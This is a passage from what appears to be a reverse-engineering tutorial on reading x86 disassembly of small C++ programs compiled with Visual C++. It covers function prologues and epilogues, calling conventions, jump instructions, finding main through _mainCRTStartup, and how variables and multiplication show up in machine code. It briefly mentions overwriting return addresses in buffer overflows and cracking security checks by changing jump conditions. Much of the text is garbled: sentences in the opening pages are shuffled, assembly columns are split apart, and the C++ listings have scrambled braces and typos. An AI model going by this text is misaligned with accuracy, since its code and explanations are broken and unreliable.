e. mostly the instructions given below constitute the prologue: 55 8B EC push mov ebp ebp. We are not going to define a function or a sub routine or whatever it is called at higher level.First of all. Every function has an identical prologue and epilogue depending upon the convention in which the function is defined. Epilogue: The ending of a function. In assembly the functions are mostly called by an instruction ‘CALL address’ the address is the place where the function code lies. if needed. rather a stdcall calling convention may be followed. But it always not means that the function is declared with Pascal call convention. The prologue contains the alignment of stack. Remember that the visual studio supports NAKED function calls which leads to functions without any prologue and developers can insert their own prologue. The ret instruction may also be a ret n instruction depending upon the calling convention. The stdcall is actually the resultant of both calling convention. Where n is a natural number. Prologue: The starting of function code. The instructions 5D C3 pop ret ebp Constitute the epilogue. void declspec (naked) nakFunct(void) } { The functions calling conventions are generally either cdecl or pascal.g. Every function has an important aspect. we must know what a function in assembly or in machine instructions is (in hex format). This epilogue is inherited from PASCAL calling convention. The calling conventions can be identified by the argument pushing methods and the stack 57 . then these instructions are enough for identification of a function’s prologue.esp If the instruction push ebp gets a call from somewhere. it transfers the execution control back to the instruction next to its caller instruction.
0040107E: 55 push ebp .2Ch 00401084: A1 B0 30 41 00 mov eax. . 00401060: 68 6F 10 40 00 push 40106Fh . prologue starts 0040105E: 8B EC mov ebp.esp 00401081: 83 EC 2C sub esp. stack clearing is done by caller function not called function.414BD0h 00401077: E8 07 2B 00 00 call 00403B83 0040107C: 5D pop ebp . 0040107F: 8B EC mov ebp. Now we can identify the functions in a program with the help of prologue and epilogue let’s do it.dword ptr ds:[004130B4h] 00401092: 89 4D D8 mov dword ptr [ebp-28h]. part of prologue.dword ptr [ebp-1Ch] 004010B2: 83 C1 01 add ecx. epilogue. 0040105D: 55 push ebp .ecx 00401095: 8B 15 B8 30 41 00 mov edx.eax 0040108C: 8B 0D B4 30 41 00 mov ecx. 0040106E: C3 ret . As the name specifies. Disassemble the secpass. part of prologue. 00401072: B9 D0 4B 41 00 mov ecx.[004130BC] 004010A3: 88 45 E0 mov byte ptr [ebp-20h]. 0040106D: 5D pop ebp .a function call from within the function.1 004010B5: 89 4D E4 mov dword ptr [ebp-1Ch]. this calling convention optimizes the called function’s code. Another calling convention fastcall is there. 0040106F: 55 push ebp.1 00 004010AD: EB 09 jmp 004010B8 004010AF: 8B 4D E4 mov ecx.ecx 004010B8: 83 7D E4 03 cmp dword ptr [ebp-1Ch].exe >c:\code\secpass.3 004010BC: 7F 6A jg 00401128 004010BE: 68 C0 30 41 00 push 4130C0h 004010C3: 68 70 4C 41 00 push 414C70h 58 .esp .al 004010A6: C7 45 E4 01 00 00 mov dword ptr [ebp-1Ch].txt . . Thus cdecl calling convention may be declared. prologue starts 00401070: 8B EC mov ebp. 0040106A: 83 C4 04 add esp. start of another func.4 .esp.edx 0040109E: A0 BC 30 41 00 mov al.dword ptr ds:[004130B8h] 0040109B: 89 55 DC mov dword ptr [ebp-24h]. .exe as Dumpbin /disasm secpass. . epilogue. epilogue 0040107D: C3 ret .txt In secpass. argument pushed on the for next function.clearing methods followed by the functions.[004130B0] 00401089: 89 45 D4 mov dword ptr [ebp-2Ch]. . epilogue. 00401065: E8 0E 46 00 00 call 00405678 .
. stack is cleared by 0 004056E6 401150h . . checkout this 414C70h . ebp. .eax .4 ebp .8 . epilogue. start of a function.8 eax.esp 402890h 00405678 esp. of a function.text section. .414D00h 004013D0 eax.8 15h edx. 00401101: 6A 00 push 00401103: E8 DE 45 00 00 call 00401108: 68 50 11 40 00 push . esp.[ebp-18h] edx ecx.4 . 004010C8: E8 D3 13 00 00 call 004010CD: 83 C4 08 add 004010D0: 6A 15 push 004010D2: 8D 55 E8 lea 004010D5: 52 push 004010D6: B9 00 4D 41 00 mov 004010DB: E8 F0 02 00 00 call 004010E0: 8D 45 E8 lea 004010E3: 50 push 004010E4: 8D 4D D4 lea 004010E7: 51 push 004010E8: E8 73 47 00 00 call 004010ED: 83 C4 08 add 004010F0: 85 C0 test may be if condition. end 004024A0 esp. . end 0040113D: 55 push 0040113E: 8B EC mov 00401140: 68 90 28 40 00 push 00401145: E8 2E 45 00 00 call 0040114A: 83 C4 04 add 0040114D: 5D pop 0040114E: C3 ret . only two words are argument was a new line ecx. epilogue. 00401108 . something from 4130E0h . 004010F2: 75 14 jne always has conditional jumps. 0040111C: 83 C4 08 add cleared from stack. 00401112: 68 70 4C 41 00 push 00401117: E8 84 13 00 00 call routine. . 004024A0 . It means the third character. 004010F4: 68 D8 30 41 00 push stack for next function 004010F9: E8 BD 46 00 00 call 004010FE: 83 C4 04 add calling function.ebp ebp . .[ebp-18h] eax ecx. 0040110D: 68 E0 30 41 00 push address may be in data section.the third argument.. . ebp .[ebp-2Ch] ecx 00405860 esp. epilogue 59 .eax 00401170 004010AF eax. end 0040112E: 55 push 0040112F: 8B EC mov 00401131: E8 2A 17 00 00 call 00401136: E8 02 00 00 00 call 0040113B: 5D pop 0040113C: C3 ret . new line is pushed from . start of a function. of function. arg pushing on 004057BB . the printing esp. ebp . a testing routine. function call. .text section is pushed on the stack. . .esp 00402860 0040113D ebp of a function. 0040111F: 8B C8 mov 00401121: E8 4A 00 00 00 call 00401126: EB 87 jmp 00401128: 33 C0 xor 0040112A: 8B E5 mov 0040112C: 5D pop 0040112D: C3 ret . testing code 4130D8h . ebp.eax esp. May be printf or cout.
The other techniques also exist to disguise the function call in which the simple call instruction is replaced by a jmp instruction. but the code may be a part of the control structure necessary for the normal execution of the software. Before discussing this technique let us discus some of aspects of call and jump instructions Call instruction: call instruction is responsible for calling a subroutine or a function. The address offset is the distance between the address of the call instruction and the first instruction of function prologue. We will also discus it in later sections. without executing the conditional jump. The conditional loops like while. We will discus this attack technique in detail later in next sections. Before the processor jumps on to the function code. Not all conditional jumps means that the code is dealing with the security. The conditional jumps are the essential parts of security systems and control structures. The conditional jumps are totally dependent upon the decision-making instructions for their operation. Call instruction is accompanied by an address offset. Remember the ret instruction will make the processor to land on an address saved in place of saved return address. In buffer overflow attacks this situation is exploited to control the execution of the processor by overwriting the saved return address. do while. which is divided into two parts: 1) Conditional jumps 2) Unconditional jumps Conditional jumps: The conditional jump instruction is followed if a certain condition is satisfied nor this instruction is crossed over safely to next instruction. Jump instructions: there is a set of jump instructions. the address of next instruction to the call instruction is saved on the stack as return address. which will be loaded in EIP at when the called function finishes its job. for and 60 . The property of call instruction to save the return address on the stack is quite helpful in the shellcode (payload) development.
Decision making instructions: We are familiar with two instructions. which are used in nearly all cases where decision-making is done. etc. jle. jge are used. It is not necessary that the next to conditional instruction will always be the conditional jump. jb. The jmp instruction always takes the processor to offset accompanied with the jmp instruction and never come back on its own. Artificial Intelligence: The machines are equipped with brain (processor). In most cases in security systems the jumps je. jz. The security system can be fractured by changing these jump conditions. greater than. The jmp instruction don’t need any decision making code before itself and works completely independent. use the conditional jumps. jne. jmp. jl. jnz. jg. while most other conditional jumps are followed by cmp instruction. cmp: The cmp instruction compares to values for their logical relationships like less than. less than equal to or greater than equal to. Je Jne Jl Jle Jg Jge …etc jump if equal jump if not equal jump if less jump if less or equal jump if greater jump if greater or equal The je and jne are normally placed after a test instruction. Unconditional jump: the unconditional jump set comprise only a single element i. The set of conditional jumps include mostly je. The cmp instruction is also followed by conditional jumps. jl. senses (sensors) but still differ from living things in lots of aspects and one is the 61 . instead there may be some other instructions and then a conditional jump. ja.decision-making structures like if & switch etc.e. These are 1) test 2) cmp test: The test condition checks whether the two values are equal or not. jne. The test instruction is followed by je or jne conditional jumps. jae. jge. jbe. jg.
txt Now check the disassembled code _main: 0040107E: 55 push ebp .cpp And now disassemble the resultant exe file as Dumpbin /DISASM emptyif. compiler can decide what to do with the code while compiling.exe >dump\emptyif. This result into a better decision-making by machines and therefore. return EXIT_SUCCESS. So the machines are also equipped now with artificial intelligence.cpp */ #include <iostream> using namespace std. Actually their intelligence depends upon the statistical databases. or the code. which is useless because its result will be. } { { compile it in any way.data section as Dumpbin /SECTION:. if ( a <= b) } else } cout << "This cout is after else" << endl.func prologue of main() 62 . which never gets control. Why should compilers lag behind in the race of the artificial intelligence? Nowadays nearly every modern compiler is equipped with artificial intelligence. int b = 3.txt And the dump of . we compiled it as CL /Gs emptyif. Compilers work independently at machine level and eliminate any code.exe >dump\emptyifdat.data /RAWDATA:bytes emptyif. better production. used nowhere. Consider the following code /* emptyif.intelligence. cout << "This cout is before if" << endl. int main () { int a = 2. system ("PAUSE"). One little example we have crafted is waiting next. Thus.
004010DD: 8B E5 mov esp. 00 00401092: 68 10 11 40 00 push 401110h 00401097: 68 A0 D0 40 00 push 40D0A0h . string “This cout is before if” is pushed on the stack. 00 0040108B: C7 45 F8 03 00 00 mov dword ptr [ebp-8]. the return . epilogue. Thus. This is the result . 004010A6: 83 C4 08 add esp. epilogue. 0040109C: 68 A8 DD 40 00 push 40DDA8h 004010A1: E8 CA 05 00 00 call 00401670 . call for endl. 3 is . 004010CE: 68 D0 D0 40 00 push 40D0D0h . the compiler . prologue of main() 00401081: 83 EC 08 sub esp. main started. 004010E0: C3 ret . is no code between these two borderline cout.” is pushed on the stack. is endl (newline). two arguments . Therefore do not surprise if compiler at low level 63 . main is prepared by zeroing the eax register.eax 004010C9: E8 62 00 00 00 call 00401130 . which enclosed the entire . single argument. reserved on stack.esp . string “This cout is after else. 004010A9: 8B C8 mov ecx. 004010C7: 8B C8 mov ecx.eax . two dwords are . We found no comparison instructions in executable file.4 . call for cout. Probably one is string pointer and other . did not placed its machine code in the exe file. endl handling code.eax . the epilogue of. therefore. saved on the stack. string “PAUSE” is pushed on the stack. . stack clearing. value of cout is moved from eax to ecx as an argument for . saved on the stack. Note that there . return value for . 004010DB: 33 C0 xor eax.0040107F: 8B EC mov ebp. 2 is . 004010AB: E8 80 00 00 00 call 00401130 . 004010DF: 5D pop ebp . 00401084: C7 45 FC 02 00 00 mov dword ptr [ebp-4]. call for endl 004010B0: 68 10 11 40 00 push 401110h 004010B5: 68 B8 D0 40 00 push 40D0B8h . the pointer to . 004010D8: 83 C4 04 add esp. 004010D3: E8 2F 33 00 00 call 00404407 .2 . if-else clause. call for cout. the pointer to .8 .3 . it’s a strong proof for compilers artificial intelligence that it can eliminate the useless code. of cout are deleted. 004010BA: 68 A8 DD 40 00 push 40DDA8h 004010BF: E8 AC 05 00 00 call 00401670 . 004010C4: 83 C4 08 add esp.8 . of artificial intelligence of compiler. the pointer to . call for system.ebp .8 . As the if-else structure was empty. stack clearing of .
int main (int argc.esp 00401081: E8 04 00 00 00 call 0040108A 00401086: 33 C0 xor eax. { Compile above program as CL /Gs nakFunc. return EXIT_SUCCESS.cpp Now produce its disassembly as follows: Dumpbin /disasm nakFunc.exe from nakFunc.txt The assembly excerpt of nakFunc. } void __declspec (naked) nakFunct() } { cout << "This is the naked function example." << endl.eliminates your code. Let us analyze the naked function at low level /* nakFunc. But we can identify it as a function bcoz the code of this block 64 .txt _main: 0040107E: 55 push ebp 0040107F: 8B EC mov ebp.cpp */ #include <iostream> using namespace std. .eax 00401088: 5D pop ebp 00401089: C3 ret nakFunc: . void nakFunct().exe >nakFunc. Well look here no prologue is prepared for this function. char* argv[]) nakFunct().
.esp 004010AB: E8 90 08 00 00 call 00401940 004010B0: E8 02 00 00 00 call 004010B7 004010B5: 5D pop ebp 004010B6: C3 ret 65 .8 004010A1: 8B C8 mov ecx. But we can eliminate the call . 0040108A: 68 D0 10 40 00 push 4010D0h 0040108F: 68 A0 C0 40 00 push 40C0A0h 00401094: 68 78 CD 40 00 push 40CD78h 00401099: E8 92 05 00 00 call 00401630 0040109E: 83 C4 08 add esp. instruction with a jmp instruction.eax 004010A3: E8 48 00 00 00 call 004010F0 004010A8: 55 push ebp 004010A9: 8B EC mov ebp. gets call through a call instruction.
Thus. it is not necessary. The developer’s defined whole number of functions or code gets calls from within the main or winmain function. the compiler does its work before the linker. the first function defined in the program high-level code gets compiled first. every main in different programs is unique. the second at second place and so on. This function calls main and after the completion of main it calls exit by returning the value returned by main to exit. we must know where the developer’s code gets control from startup code. The way of data handling may be different but resulting output will be the same. But we must find it out. It happens because of the different conventions used by the compiler developers. we must know first that where the main function gets call. But remember that the algorithm used will never change. Therefore. The function in startup code that calls main is _mainCRTStartup. It can change depending upon the developer’s intentions and project settings. 66 .Identification of main Before analyzing the code. Note: The library functions structure depends upon the version and compiler used. But we have to focus first on identification of the main. thus. We mean by its signature. Also. Remember. Therefore we can cram the structures of few important library functions. try to identify the algorithms. The _mainCRTStartup has a unique signature that can be easily identified. the compiled programs in different compilers and different versions of library will always be different. unidentifiable. in EAX register. Therefore. Therefore. even the programmer’s compiled code will also be different in different compilers. The _mainCRTStartup can be identified in assembly code in the same way antivirus software detects the presence of a virus. Note: In most of the cases. the first function’s code in executable file starts at 0x0040107E. Then the linker appends other library functions later. But remember. The structure of every main function in different programs is completely dependent upon the programmer’s code. Therefore we can conclude that the compiled code for all functions defined by the programmer and the main function should concentrate them near the top of the executable file. Moreover. The library functions and startup code are static in nature means always the same code unlike main. The startup code is appended by the linker at the end of the compiled programmer’s code in executable files.
eax .the signature of mainCRTStartup -----------0040496A: E8 05 27 00 00 call 00407074 0040496F: FF 15 08 B0 40 00 call dword ptr ds:[0040B008h] 00404975: A3 E4 F6 40 00 mov [0040F6E4].0 .eax 0040497A: E8 C3 25 00 00 call 00406F42 0040497F: A3 64 E1 40 00 mov [0040E164]. The functions mostly get control by a call instruction and before call instruction the function arguments are prepared for the called function. Let’s check the _mainCRTStartup of emptyif. let’s check where the _mainCRTStartup transfers control to main.cram the above structure ------------------00404993: A1 9C E1 40 00 mov eax.------------------------.the arguments for main -------------------0040499D: 50 push eax 0040499E: FF 35 94 E1 40 00 push dword ptr ds:[0040E194h] 004049A4: FF 35 90 E1 40 00 push dword ptr ds:[0040E190h] 67 .eax 00404984: E8 6C 23 00 00 call 00406CF5 00404989: E8 AE 22 00 00 call 00406C3C 0040498E: E8 A9 11 00 00 call 00405B3C .[0040E19C] 00404998: A3 A0 E1 40 00 mov [0040E1A0].0 .eax 00407BE2 [0040F224].------------------------. Check out the code excerpt given below 00404C6A: 00404C6F: 00404C75: 00404C7A: 00404C7F: 00404C84: 00404C89: 00404C8E: E8 FF A3 E8 A3 E8 E8 E8 6C 15 24 63 24 0C 4E 1D 1F 14 F7 2F F2 2D 2C F9 00 C0 40 00 40 00 00 FF 00 40 00 00 00 00 00 00 FF call call mov call mov call call call 00406BDB dword ptr ds:[0040C014h] [0040F724].-----------------------. Now. It has two consecutive call instructions then one mov instruction and then a call instruction then again one mov instruction and at last the three consecutive call instructions.exe 0040495E: 6A 1C push 1Ch 00404960: E8 9A 00 00 00 call 004049FF 00404965: 59 pop ecx 00404966: 83 65 FC 00 and dword ptr [ebp-4].We are not going very deeply but our observations are based on general distinctions.eax 00407995 004078DC 004045B0 This kind of structure makes the _mainCRTStartup unique. The main has a unique set of its three arguments. This is the signature produced by Microsoft visual Studio 6.
We can use some tricks to find the _mainCRTStartup function. Remember.dword ptr [eax] 004049C0: 8B 09 mov ecx. Just scroll down a little and you will find the familiar structure of three calls then the call for main and after completion of main the call for exit.dword ptr [ebp-14h] 004049BE: 8B 08 mov ecx.--------------------. This method is very cumbersome and is helpful in small programs only where the programmer defines few functions or where only inline functions are used.next the call for main -------------------004049AA: E8 CF C6 FF FF call 0040107E . Open the executable in visual c++ and click on the Build menu.----------------------. This method is easiest. Another method involves the checking of every function near the top of executable and checking its caller function and analyzing the caller functions signature.return value of main in eax register ---------004049B5: 50 push eax .0Ch 004049B2: 89 45 E4 mov dword ptr [ebp-1Ch].--------------------.eax .dword ptr [ecx] 004049C2: 89 4D E0 mov dword ptr [ebp-20h]. Then Start debug and then step into or press F11.next call for exit ---------------------------004049B6: E8 AE 11 00 00 call 00405B69 004049BB: 8B 45 EC mov eax.. the call for main 004049AF: 83 C4 0C add esp. The first instruction that will be shown with arrow pointer (where we will land) and executing will be the prologue of _mainCRTStartup function. the main function will always be followed by exit function.ecx 004049C5: 50 push eax 004049C6: 51 push ecx 004049C7: E8 EC 20 00 00 call 00406AB8 004049CC: 59 pop ecx 004049CD: 59 pop ecx 004049CE: C3 ret Note: we have not used the whole code of _mainCRTStartup. 68 .
float f.cpp */ #include <iostream> using namespace std. the 2nd cout add mov 00 00 call used in cout.eax 004011D0 . 00401098: 83 C4 08 0040109B: 8B C8 0040109D: E8 2E 01 .14. } And the disassembled code of main: _main: 0040107E: 55 0040107F: 8B EC 00401081: 83 EC 0C 00401084: 68 B0 11 00401089: 68 B0 40 0040108E: 68 D8 5C 00401093: E8 A8 0B . int main () { cout << "The variable definitions starts.Variable Definitions Let us develop the following program /* variable. associated to endl 004010A2: 68 B0 11 004010A7: 68 D4 40 004010AC: 68 D8 5C 004010B1: E8 8A 0B . cout << "float f = " << f << endl. cout << "int i = " << i << endl. i = 123.0Ch 4011B0h 4140B0h 415CD8h 00401C40 . 40 00 push 41 00 push 41 00 push 00 00 call 69 . function call. this call may be 4011B0h 4140D4h 415CD8h 00401C40 . f = 3." << endl. cout << "char c = " << c << endl. the 1st cout esp. function call. char c. c = 0x41. return EXIT_SUCCESS. 40 41 41 00 00 00 00 00 push mov sub push push push call ebp ebp.8 ecx. cout << "The variable definitions ends. int i." << endl.esp esp.
; ; ;
; ; ; ;
;
004010B6: 83 C4 08 add esp,8 004010B9: 8B C8 mov ecx,eax 004010BB: E8 10 01 00 00 call 004011D0 ; this call may be associated to endl used in cout. 004010C0: C7 45 F4 7B 00 00 mov dword ptr [ebp-0Ch],7Bh the 7B is hex of 123 in decimal. Is placed in stack memory. 00 004010C7: C6 45 FC 41 mov byte ptr [ebp-4],41h the char type is also placed in the stack memory. 004010CB: C7 45 F8 C3 F5 48 mov dword ptr [ebp-8],4048F5C3h 40 ; this larger value is probably the float type. 004010D2: 68 B0 11 40 00 push 4011B0h ; the cout statements block, displaying the variables starts here. 004010D7: 8B 45 F4 mov eax,dword ptr [ebp-0Ch] the int type variable is placed in eax. 004010DA: 50 push eax ; the eax is pushed in stack as an argument to cout function. 004010DB: 68 F4 40 41 00 push 4140F4h ; the string “int i = “, its reference is pushed as an argument. 004010E0: 68 D8 5C 41 00 push 415CD8h 004010E5: E8 56 0B 00 00 call 00401C40 ; call for cout. 004010EA: 83 C4 08 add esp,8 ; stack of cout is cleared. 004010ED: 8B C8 mov ecx,eax 004010EF: E8 FC 00 00 00 call 004011F0 004010F4: 8B C8 mov ecx,eax 004010F6: E8 D5 00 00 00 call 004011D0 004010FB: 68 B0 11 40 00 push 4011B0h 00401100: 8A 4D FC mov cl,byte ptr [ebp-4] 00401103: 51 push ecx 00401104: 68 00 41 41 00 push 414100h 00401109: 68 D8 5C 41 00 push 415CD8h 0040110E: E8 2D 0B 00 00 call 00401C40 00401113: 83 C4 08 add esp,8 00401116: 50 push eax 00401117: E8 F4 0D 00 00 call 00401F10 0040111C: 83 C4 08 add esp,8 0040111F: 8B C8 mov ecx,eax 00401121: E8 AA 00 00 00 call 004011D0 00401126: 68 B0 11 40 00 push 4011B0h 0040112B: 8B 55 F8 mov edx,dword ptr [ebp-8] 0040112E: 52 push edx 0040112F: 68 0C 41 41 00 push 41410Ch 00401134: 68 D8 5C 41 00 push 415CD8h 00401139: E8 02 0B 00 00 call 00401C40 0040113E: 83 C4 08 add esp,8 00401141: 8B C8 mov ecx,eax 00401143: E8 B8 03 00 00 call 00401500 00401148: 8B C8 mov ecx,eax 0040114A: E8 81 00 00 00 call 004011D0 0040114F: 33 C0 xor eax,eax 00401151: 8B E5 mov esp,ebp 00401153: 5D pop ebp 00401154: C3 ret
70
And a part of the .data section which is important to us is
First thing to remember is that the variable names, which are defined by the programmer, are omitted from the machine code. The variables are tracked by their offsets in stack or are handed over to registers. The structure of program code generated by the compiler differs from that of the original c++ code. The two cout statements are digested together in the disassembled code while in source code; we have separated both cout statements by variable declarations.
71
The Operators Identification The operators are the essential parts of algorithms. Even the minute algorithms use some kind of addition, subtraction or multiplication, division, etc. All these operations are carried out using their respective operators in the higher-level languages. Let us encode an example in c++ employing the multiplication of two variables.
/* multiply.cpp */ #include <iostream> using namespace std; int main (int argc, char* argv[]) int a = 5, b = 10, c = 0; c = a*b; cout << "The product a*b = " << c << endl; return EXIT_SUCCESS; } {
Now save and build the multiply.cpp and compile it from console as:
CL /Gs multiply.cpp
The following command can produce the disassembly of the exe file:
Dumbin /disasm multiply.exe >multiplyx.txt
The disassembled code will go in multiplyx.txt file. Let us analyze the following code snippet:
72
_main: 0040107E: 0040107F: 00401081: 00401084: 0040108B: 00401092: 00401099: 0040109C: 004010A0: 004010A3: 004010A8: 004010AB: 004010AC: 004010B1: 004010B6: 004010BB: 004010BE: 004010C0: 004010C5: 004010C7: 004010CC: 004010CE: 004010D0:
55 8B 83 C7 00 C7 00 C7 00 8B 0F 89 68 8B 51 68 68 E8 83 8B E8 8B E8 33 8B 5D
EC EC 0C 45 FC 05 00 00 45 F8 0A 00 00 45 F4 00 00 00 45 AF 45 30 4D B0 88 45 C4 C8 AB C8 84 C0 E5 FC 45 F8 F4 11 40 00 F4 40 41 00 5C 41 00 09 00 00 08 00 00 00 00 00 00
push mov sub mov mov mov mov imul mov push mov push push push call add mov call mov call xor mov pop ret
ebp ebp,esp esp,0Ch dword ptr [ebp-4],5 dword ptr [ebp-8],0Ah dword ptr [ebp-0Ch],0 eax,dword eax,dword dword ptr 401130h ecx,dword ecx 4140B0h 415C88h 00401A00 esp,8 ecx,eax 00401170 ecx,eax 00401150 eax,eax esp,ebp ebp ptr [ebp-4] ptr [ebp-8] [ebp-0Ch],eax ptr [ebp-0Ch]
004010D1: C3
The above scrutiny clears a lot about the variable handling in stack at low-level. The imul var1_containr, var2_containr instruction is used for multiplication. Where var1_containr & var2_containr are the containers of two variables to be multiplied. These containers may be registers or the memory locations. But for security reasons, the algorithms can be altered to show a deviated behaviors from normal, but yield the expected results with same precisions. This can be achieved by not using the standard operators for the required operation, but using the alternative instructions. For example, the multiplication of two variables x and y yielding another variable m can be done in several ways, but we are listing two ways here: m = x * y -----------(1)
73
And
For(m=0,x; x > 0; x--) m =+ y; }
{
} }----------(2) }
The algorithm (1) can be easily identified in first sight, while as the (2) algorithm also results in multiplication and produces the same result. But in second case, one of the x variable gets decremented and thus x suffers from value change. The algorithm (2) can be performed using any kind of loop or by flat method for better speed we can just add one variable times the other but, then we need their values predefined in code itself.
/* multalt.cpp */ #include <iostream> using namespace std; int main (int argc, char* argv[]) int m, x=0, y=0; cout << "Enter the first number: "; cin >> x; cout << "Enter the second number: "; cin >> y; // the second algorithm for(m=0,x; x >0; x--) m += y; cout << "x * y = " << m << endl; return EXIT_SUCCESS; } {
Let us examine the disassembly of the (2) algorithm:
74
_main: 0040107E: 0040107F: 00401081: ; the above 00401084: ; ; ; ; 55 push ebp 8B EC mov ebp,esp 83 EC 0C sub esp,0Ch instruction reserves a space for 3 DWORD variables. C7 45 FC 00 00 00 mov dword ptr [ebp-4],0 00 the variable x is initialized to 0 at ebp-4. 0040108B: C7 45 F8 00 00 00 mov dword ptr [ebp-8],0 00 the variable y is initialized to 0 at ebp-8. variable m is not initialized yet anywhere in the code. now the cout stub comes into action. 00401092: 68 B0 70 41 00 push 4170B0h 00401097: 68 88 8D 41 00 push 418D88h 0040109C: E8 BF 15 00 00 call 00402660 call for cout. 004010A1: 83 C4 08 add esp,8 clearing the stack of cout function. now the cin code stub 004010A4: 8D 45 FC lea eax,[ebp-4] address of x is loaded into eax register. 004010A7: 50 push eax 004010A8: B9 18 8E 41 00 mov ecx,418E18h 004010AD: E8 8E 06 00 00 call 00401740 the call for cin function. again cout code stub. 004010B2: 68 CC 70 41 00 push 4170CCh 004010B7: 68 88 8D 41 00 push 418D88h 004010BC: E8 9F 15 00 00 call 00402660 call for cout. 004010C1: 83 C4 08 add esp,8 the second cin code. 004010C4: 8D 4D F8 lea ecx,[ebp-8] 004010C7: 51 push ecx 004010C8: B9 18 8E 41 00 mov ecx,418E18h 004010CD: E8 6E 06 00 00 call 00401740 the call for cin. from here the for loop begins. And following is the variable initialization. 004010D2: C7 45 F4 00 00 00 mov dword ptr [ebp-0Ch],0 00 now the variable m is initialized to 0 at ebp-0C position in stack. now the next code is the beginning of our second algorithm. 004010D9: EB 09 jmp 004010E4 the above jump instruction lands in the control section of the loop. 004010DB: 8B 55 FC mov edx,dword ptr [ebp-4] variable y [ebp – 4] is loaded into edx register. 004010DE: 83 EA 01 sub edx,1 the edx value is decreased by virtue of decrement operator “—“. 004010E1: 89 55 FC mov dword ptr [ebp-4],edx the decreased value is overwritten on y (i.e. at [ebp – 4]). all these overwriting instructions can be avoided if pointers are used at higher-level program code, it also speeds up the code
; ; ; ;
; ;
; ;
; ; ; ; ; ; ; ; ; ; ;
75
; execution. 004010E4: 83 7D FC 00 cmp dword ptr [ebp-4],0 ; this is the loop control condition, in high-level ; it is defined as x > 0. 004010E8: 7E 0B jle 004010F5 ; jump if value at ebp-4 (i.e. x) is lower than 0. ; this jump is followed when the loop ends. 004010EA: 8B 45 F4 mov eax,dword ptr [ebp-0Ch] ; the address of m is loaded into eax register. 004010ED: 03 45 F8 add eax,dword ptr [ebp-8] ; the value at ebp-8 (variable y) is added to value in eax register. 004010F0: 89 45 F4 mov dword ptr [ebp-0Ch],eax ; the eax value is overwritten on the variable m at ebp-0C. ; it resulted from operator “+=”. 004010F3: EB E6 jmp 004010DB ; a jump to the third section of for loop i.e. the increment-decrement ; section. 004010F5: 68 A0 11 40 00 push 4011A0h 004010FA: 8B 4D F4 mov ecx,dword ptr [ebp-0Ch] ; the final result is loaded in ecx register from location [ebp – 0C] ; (i.e. the variable m). 004010FD: 51 push ecx ; the value in ecx register i.e. the variable m is pushed in the stack on cout function. 004010FE: 68 E8 70 41 00 push 4170E8h 00401103: 68 88 8D 41 00 push 418D88h 00401108: E8 53 15 00 00 call 00402660 ; the cout function call. 0040110D: 83 C4 08 add esp,8 ; the stack clearing for cout function. 00401110: 8B C8 mov ecx,eax 00401112: E8 C9 00 00 00 call 004011E0 00401117: 8B C8 mov ecx,eax 00401119: E8 A2 00 00 00 call 004011C0 0040111E: 33 C0 xor eax,eax 00401120: 8B E5 mov esp,ebp 00401122: 5D pop ebp 00401123: C3 ret
The above disassembled code is totally mangled in a loop code and does not employ imul instruction. The next example employs the pointers instead of original variables for multiplication.
/* mulaptr.cpp */ #include <iostream> using namespace std; int main (int argc, char* argv[]) { int m=0, x=0, y=0; int *a, *b, *c; a = &m; b = &x; c = &y; cout << "Enter the first number: ";
76
cin >> x; cout << "Enter the second number: "; cin >> y; for (int i=0; i < *b; i++) *a += *c; cout << "x * y = " << m << endl; return EXIT_SUCCESS; }
The disassembled code as generated by the dumpbin.exe is shown below:
_main: 0040107E: 55 push ebp 0040107F: 8B EC mov ebp,esp 00401081: 83 EC 1C sub esp,1Ch ; stack worth 28 bytes is reserved. 00401084: C7 45 E4 00 00 00 mov dword ptr [ebp-1Ch],0 00 0040108B: C7 45 F0 00 00 00 mov dword ptr [ebp-10h],0 00 00401092: C7 45 E8 00 00 00 mov dword ptr [ebp-18h],0 00 ; above all the variables, m, x & y are respectively initialized. 00401099: 8D 45 E4 lea eax,[ebp-1Ch] 0040109C: 89 45 FC mov dword ptr [ebp-4],eax 0040109F: 8D 4D F0 lea ecx,[ebp-10h] 004010A2: 89 4D F8 mov dword ptr [ebp-8],ecx 004010A5: 8D 55 E8 lea edx,[ebp-18h] 004010A8: 89 55 F4 mov dword ptr [ebp-0Ch],edx 004010AB: 68 B0 70 41 00 push 4170B0h 004010B0: 68 88 8D 41 00 push 418D88h 004010B5: E8 C6 15 00 00 call 00402680 004010BA: 83 C4 08 add esp,8 004010BD: 8D 45 F0 lea eax,[ebp-10h] 004010C0: 50 push eax 004010C1: B9 18 8E 41 00 mov ecx,418E18h 004010C6: E8 95 06 00 00 call 00401760 004010CB: 68 CC 70 41 00 push 4170CCh 004010D0: 68 88 8D 41 00 push 418D88h 004010D5: E8 A6 15 00 00 call 00402680 004010DA: 83 C4 08 add esp,8 004010DD: 8D 4D E8 lea ecx,[ebp-18h] 004010E0: 51 push ecx 004010E1: B9 18 8E 41 00 mov ecx,418E18h 004010E6: E8 75 06 00 00 call 00401760 004010EB: C7 45 EC 00 00 00 mov dword ptr [ebp-14h],0 00 004010F2: EB 09 jmp 004010FD 004010F4: 8B 55 EC mov edx,dword ptr [ebp-14h] 004010F7: 83 C2 01 add edx,1 004010FA: 89 55 EC mov dword ptr [ebp-14h],edx 004010FD: 8B 45 F8 mov eax,dword ptr [ebp-8] 00401100: 8B 4D EC mov ecx,dword ptr [ebp-14h] 00401103: 3B 08 cmp ecx,dword ptr [eax] 00401105: 7D 11 jge 00401118
77
00401107: 0040110A: 0040110C: 0040110F: 00401111: 00401114: 00401116: 00401118: 0040111D: 00401120: 00401121: 00401126: 0040112B: 00401130: 00401133: 00401135: 0040113A: 0040113C: 00401141: 00401143: 00401145: 00401146:
8B 8B 8B 03 8B 89 EB 68 8B 50 68 68 E8 83 8B E8 8B E8 33 8B 5D C3
55 02 4D 01 55 02 DC C0 45 E8 88 50 C4 C8 C6 C8 9F C0 E5
FC F4 FC 11 40 00 E4 70 41 00 8D 41 00 15 00 00 08 00 00 00 00 00 00
mov mov mov add mov mov jmp push mov push push push call add mov call mov call xor mov pop ret
edx,dword eax,dword ecx,dword eax,dword edx,dword dword ptr 004010F4 4011C0h eax,dword eax 4170E8h 418D88h 00402680 esp,8 ecx,eax 00401200 ecx,eax 004011E0 eax,eax esp,ebp ebp
ptr [ebp-4] ptr [edx] ptr [ebp-0Ch] ptr [ecx] ptr [ebp-4] [edx],eax ptr [ebp-1Ch]
